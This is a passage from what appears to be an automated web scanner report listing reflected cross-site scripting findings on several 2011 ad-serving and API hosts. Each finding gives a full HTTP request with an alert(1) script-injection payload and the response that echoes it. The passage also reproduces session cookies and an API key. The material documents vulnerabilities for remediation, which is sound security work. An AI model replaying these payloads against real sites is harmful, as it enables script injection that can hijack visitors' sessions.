Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/0/154/ADTECH9fd55"><script>alert(1)</script>94b70172a07;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

1.68. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [cookie parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.adtechus.com
Path:	/adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of the cookie request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c48c"><script>alert(1)</script>9172a92def1 was submitted in the cookie parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=0000019c48c"><script>alert(1)</script>9172a92def1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=0000019c48c"><script>alert(1)</script>9172a92def1;adiframe=y">
...[SNIP]...

1.69. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.adtechus.com
Path:	/adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd538"><script>alert(1)</script>254bcc5e869 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001&fd538"><script>alert(1)</script>254bcc5e869=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 297

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001&fd538"><script>alert(1)</script>254bcc5e869=1;adiframe=y">
...[SNIP]...

1.70. http://adserving.cpxinteractive.com/st [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserving.cpxinteractive.com
Path:	/st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30ced"-alert(1)-"bb2604ed03b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=ad&ad_size=728x90&section=967562&30ced"-alert(1)-"bb2604ed03b=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/216/us/728x90/news?t=1297647385452&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.independent.co.uk%2Fnews%2Fworld%2Fafrica%2Fis-the-army-tightening-its-grip-on-egypt-2213849.html&refer=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:35 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 14 Feb 2011 01:37:35 GMT
Pragma: no-cache
Content-Length: 4332
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://adserving.cpxinteractive.com/imp?30ced"-alert(1)-"bb2604ed03b=1&Z=728x90&s=967562&_salt=1387362591";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Arr
...[SNIP]...

1.71. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-4 [mpt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/13966-88527-2151-4

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3685f'-alert(1)-'4d88b1eaae was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/js/13966-88527-2151-4?mpt=21704443685f'-alert(1)-'4d88b1eaae&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/a%3B234423004%3B0-0%3B1%3B20580498%3B4307-300/250%3B40033801/40051588/1%3B%3B%7Eokv%3D%3Bad%3Dbb%3Bsz%3D300x250%3Bpos%3Dinline_bb%3Bpoe%3Dyes%3Borbit%3Dy%3Bdel%3Diframe%3Bfromrss%3Dn%3Brss%3Dn%3Bheavy%3Dy%3Bpage%3Darticle%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=13966:2151/14302:28901/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 462
Date: Mon, 14 Feb 2011 01:38:23 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/3/0/*/a;234423004;0-0;1;20580498;4307-300/250;40033801/40051588/1;;~okv=;ad=bb;sz=300x250;pos=inline_bb;poe=yes;orbit=y;del=iframe;fromrss=n;rss=n;heavy=y;page=article;~aopt=6/0/ff/0;~sscs=?http://altfarm.mediaplex.com/ad/ck/13966-88527-2151-4?mpt=21704443685f'-alert(1)-'4d88b1eaae">
...[SNIP]...

1.72. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-4 [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/13966-88527-2151-4

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 707c4'%3balert(1)//6d6a9985586 was submitted in the mpvc parameter. This input was echoed as 707c4';alert(1)//6d6a9985586 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/js/13966-88527-2151-4?mpt=2170444&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/a%3B234423004%3B0-0%3B1%3B20580498%3B4307-300/250%3B40033801/40051588/1%3B%3B%7Eokv%3D%3Bad%3Dbb%3Bsz%3D300x250%3Bpos%3Dinline_bb%3Bpoe%3Dyes%3Borbit%3Dy%3Bdel%3Diframe%3Bfromrss%3Dn%3Brss%3Dn%3Bheavy%3Dy%3Bpage%3Darticle%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f707c4'%3balert(1)//6d6a9985586 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=13966:2151/14302:28901/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 463
Date: Mon, 14 Feb 2011 01:38:26 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/3/0/*/a;234423004;0-0;1;20580498;4307-300/250;40033801/40051588/1;;~okv=;ad=bb;sz=300x250;pos=inline_bb;poe=yes;orbit=y;del=iframe;fromrss=n;rss=n;heavy=y;page=article;~aopt=6/0/ff/0;~sscs=?707c4';alert(1)//6d6a9985586http://altfarm.mediaplex.com/ad/ck/13966-88527-2151-4?mpt=2170444">
...[SNIP]...

1.73. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-4 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/13966-88527-2151-4

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58cba'%3balert(1)//d36ec453a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 58cba';alert(1)//d36ec453a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/js/13966-88527-2151-4?mpt=2170444&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/a%3B234423004%3B0-0%3B1%3B20580498%3B4307-300/250%3B40033801/40051588/1%3B%3B%7Eokv%3D%3Bad%3Dbb%3Bsz%3D300x250%3Bpos%3Dinline_bb%3Bpoe%3Dyes%3Borbit%3Dy%3Bdel%3Diframe%3Bfromrss%3Dn%3Brss%3Dn%3Bheavy%3Dy%3Bpage%3Darticle%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f&58cba'%3balert(1)//d36ec453a8=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=13966:2151/14302:28901/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 465
Date: Mon, 14 Feb 2011 01:38:27 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/3/0/*/a;234423004;0-0;1;20580498;4307-300/250;40033801/40051588/1;;~okv=;ad=bb;sz=300x250;pos=inline_bb;poe=yes;orbit=y;del=iframe;fromrss=n;rss=n;heavy=y;page=article;~aopt=6/0/ff/0;~sscs=?&58cba';alert(1)//d36ec453a8=1http://altfarm.mediaplex.com/ad/ck/13966-88527-2151-4?mpt=2170444">
...[SNIP]...

1.74. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-6 [mpt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/13966-88527-2151-6

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bbeaf'-alert(1)-'9307f7dd42 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/js/13966-88527-2151-6?mpt=2157694bbeaf'-alert(1)-'9307f7dd42&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/u%3B234423007%3B0-0%3B1%3B3619820%3B10408-336/850%3B40033784/40051571/1%3B%3B%7Eokv%3D%3Bad%3Dss%3Bad%3Dbb%3Bad%3Dhp%3Bsz%3D160x600%2C300x250%2C336x850%3Bpos%3Dad6%3Bpoe%3Dyes%3Borbit%3Dy%3Bdel%3Djs%3Bfromrss%3Dn%3Brss%3Dn%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Set-Cookie: mojo3=13966:2151/14302:28901/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113; expires=Wed, 13-Feb-2013 5:55:16 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 457
Date: Mon, 14 Feb 2011 01:37:39 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/3/0/*/u;234423007;0-0;1;3619820;10408-336/850;40033784/40051571/1;;~okv=;ad=ss;ad=bb;ad=hp;sz=160x600,300x250,336x850;pos=ad6;poe=yes;orbit=y;del=js;fromrss=n;rss=n;~aopt=6/0/ff/0;~sscs=?http://altfarm.mediaplex.com/ad/ck/13966-88527-2151-6?mpt=2157694bbeaf'-alert(1)-'9307f7dd42">
...[SNIP]...

1.75. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-6 [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/13966-88527-2151-6

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 712dc'%3balert(1)//23d3264674b was submitted in the mpvc parameter. This input was echoed as 712dc';alert(1)//23d3264674b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/js/13966-88527-2151-6?mpt=2157694&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/u%3B234423007%3B0-0%3B1%3B3619820%3B10408-336/850%3B40033784/40051571/1%3B%3B%7Eokv%3D%3Bad%3Dss%3Bad%3Dbb%3Bad%3Dhp%3Bsz%3D160x600%2C300x250%2C336x850%3Bpos%3Dad6%3Bpoe%3Dyes%3Borbit%3Dy%3Bdel%3Djs%3Bfromrss%3Dn%3Brss%3Dn%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f712dc'%3balert(1)//23d3264674b HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Set-Cookie: mojo3=13966:2151/14302:28901/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113; expires=Wed, 13-Feb-2013 5:55:16 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 455
Date: Mon, 14 Feb 2011 01:37:42 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/3/0/*/u;234423007;0-0;1;3619820;10408-336/850;40033784/40051571/1;;~okv=;ad=ss;ad=bb;ad=hp;sz=160x600,300x250,336x850;pos=ad6;poe=yes;orbit=y;del=js;fromrss=n;rss=n;~aopt=6/0/ff/0;~sscs=?712dc';alert(1)//23d3264674bhttp://altfarm.mediaplex.com/ad/ck/13966-88527-2151-6?mpt=2157694">
...[SNIP]...

1.76. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-6 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/13966-88527-2151-6

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4bde'%3balert(1)//6d86e68f733 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f4bde';alert(1)//6d86e68f733 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/js/13966-88527-2151-6?mpt=2157694&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/u%3B234423007%3B0-0%3B1%3B3619820%3B10408-336/850%3B40033784/40051571/1%3B%3B%7Eokv%3D%3Bad%3Dss%3Bad%3Dbb%3Bad%3Dhp%3Bsz%3D160x600%2C300x250%2C336x850%3Bpos%3Dad6%3Bpoe%3Dyes%3Borbit%3Dy%3Bdel%3Djs%3Bfromrss%3Dn%3Brss%3Dn%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f&f4bde'%3balert(1)//6d86e68f733=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Set-Cookie: mojo3=13966:2151/14302:28901/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113; expires=Wed, 13-Feb-2013 5:55:16 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 458
Date: Mon, 14 Feb 2011 01:37:45 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/3/0/*/u;234423007;0-0;1;3619820;10408-336/850;40033784/40051571/1;;~okv=;ad=ss;ad=bb;ad=hp;sz=160x600,300x250,336x850;pos=ad6;poe=yes;orbit=y;del=js;fromrss=n;rss=n;~aopt=6/0/ff/0;~sscs=?&f4bde';alert(1)//6d86e68f733=1http://altfarm.mediaplex.com/ad/ck/13966-88527-2151-6?mpt=2157694">
...[SNIP]...

1.77. http://api.bizographics.com/v1/profile.json [&callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.json

Issue detail

The value of the &callback request parameter is copied into the HTML document as plain text between tags. The payload b93bd<script>alert(1)</script>a6d294015c8 was submitted in the &callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoDatab93bd<script>alert(1)</script>a6d294015c8&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2400_NewsReel.html?baseDocId=SB10001424052748704329104576138271281667798
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KXTjLwm8dPXkaj5XcunNcMDa7Re6IGD4lLFy3bMisHmNbAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRCZ1UAhIHgQp0s9VPhT38SEVUJBxdqAyDQmBis3kUIRCUjpBQhSgJ05dWzEQqSCDqAipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Mon, 14 Feb 2011 01:36:39 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7Kb8iiqRrrqiiplaj5XcunNcMDa7Re6IGD4lBFocpwBNElwAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtSkshqfjmnjnFGDBYisbP9XVEVUJBxdqAyA0iimflEzxWuEyFjlqKSSPxZXQiiFVMClmMipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 219
Connection: keep-alive

dj.module.ad.bio.loadBizoDatab93bd<script>alert(1)</script>a6d294015c8({"bizographics":{"industry":[{"code":"business_services","name":"Business Services"}],"location":{"code":"texas","name":"USA - Texas"}},"usage":1});

1.78. http://api.bizographics.com/v1/profile.json [api_key parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.json

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 36839<script>alert(1)</script>f9aaf154604 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun36839<script>alert(1)</script>f9aaf154604 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2400_NewsReel.html?baseDocId=SB10001424052748704329104576138271281667798
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KXTjLwm8dPXkaj5XcunNcMDa7Re6IGD4lLFy3bMisHmNbAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRCZ1UAhIHgQp0s9VPhT38SEVUJBxdqAyDQmBis3kUIRCUjpBQhSgJ05dWzEQqSCDqAipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 14 Feb 2011 01:36:41 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 84
Connection: keep-alive

Unknown API key: (r9t72482usanbp6sphprhvun36839<script>alert(1)</script>f9aaf154604)

1.79. http://api.dimestore.com/viapi [id parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://api.dimestore.com
Path:	/viapi

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 60c4a<a>9e2f8f9272e was submitted in the id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /viapi?action=pixel&id=64105156860c4a<a>9e2f8f9272e HTTP/1.1
Host: api.dimestore.com
